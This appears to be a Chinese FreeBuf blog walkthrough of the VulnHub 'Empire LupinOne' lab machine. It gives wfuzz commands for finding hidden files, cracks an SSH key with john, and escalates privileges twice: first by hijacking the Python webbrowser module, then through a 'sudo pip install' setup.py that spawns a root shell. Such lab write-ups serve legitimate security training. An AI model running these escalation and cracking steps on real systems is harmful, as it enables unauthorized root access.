freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Empire LupinOne靶机渗透
hailong86 2022-05-30 21:01:04 108085
所属地 吉林省

1.靶机介绍

靶机下载地址:https://www.vulnhub.com/entry/empire-lupinone,750/
靶机提示:
Description
Difficulty: Medium
This box was created to be medium, but it can be hard if you get lost.
CTF like box. You have to enumerate as much as you can.
For hints discord Server ( https://discord.gg/7asvAhCEhe )
靶机IP:10.8.0.102

2.端口发现

扫描靶机信息,发现开放了22和80端口,发现了robots.txt和/~myfiles
图片.png

3.wfuzz参数爆破

/~myfiles比较可以,查看一下,返回错误界面,猜测还会有和/~下还会有其他页面
图片.png
尝试利用wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt http://10.8.0.102/~FUZZ爆破一下,结果太多,可以过滤一下
图片.png
利用--hw参数过滤Word尝试一下
wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hw 31 http://10.8.0.102/~FUZZ,扫描到secret
图片.png
访问http://10.8.0.102/~secret/,提示在这个目录下有隐藏的ssh私钥文件,fasttrack字典,得到用户名icex64
图片.png
利用wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404,403 -u http://10.8.0.102/~secret/.FUZZ.txt搜索.txt的文件类型的隐藏文件,找到.mysecret.txt
图片.png

4.秘钥解密与破解

访问http://10.8.0.102/~secret/.mysecret.txt,全是密文
图片.png
利用base解密,base58成功解密,得到私钥内容
图片.png
图片.png
将密文写入到key文件内(秘钥文件需要赋权600),使用 ssh2john.py 编译一下,生成passkey.txt
图片.png
利用john --wordlist=/usr/share/wordlists/fasttrack.txt passkey.txt进行破解,得到密码P@55w0rd!
图片.png

5.ssh登录

利用用户名icex64和密码P@55w0rd!及私钥key文件成功登录ssh,查看当前目录下文件,有一个user.txt
图片.png
查看user.txt,得到一个flag:3mp!r3{I_See_That_You_Manage_To_Get_My_Bunny}
图片.png

6.反弹shell提权

sudo -l发现/usr/bin/python3.9 /home/arsene/heist.py可以不需要密码执行arsene权限,无法直接提权到arsene用户,那么可以利用这个文件反弹个shell
图片.png
/home/arsene/heist.py只有可读权限,无法写入
图片.png
查看文件,发现引用了webbrowser库,可以尝试利用
图片.png
find /usr/ -name 'webbrowser'查找一下这个文件,文件权限是最高权限
图片.png
图片.png
vi编辑文件,写入shell,os.system("/bin/bash")
图片.png
sudo -u arsene python3.9 /home/arsene/heist.py成功切换到arsene用户
图片.png

7.pip提权

sudo -l 发现/usr/bin/pip可以不需要密码执行root权限
图片.png
查找pip提权方式,尝试一下
图片.png
依次执行
TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip install $TF
成功拿到root,拿到flag!!!
图片.png
图片.png

8.总结

非常有意思的一个靶场,有2处提权,从低权限用户提权到高权限用户,再提权到root,这里的难点其实还是wfuzz。

# 渗透测试 # 网络安全 # web安全 # 系统安全 # 漏洞分析
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 hailong86 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
hailong86 LV.5
这家伙太懒了,还未填写个人描述!
  • 25 文章数
  • 11 关注者
Vikings靶机渗透
2023-03-03
HA Rudra靶机渗透
2022-12-18
EVM靶机通关
2022-12-05
文章目录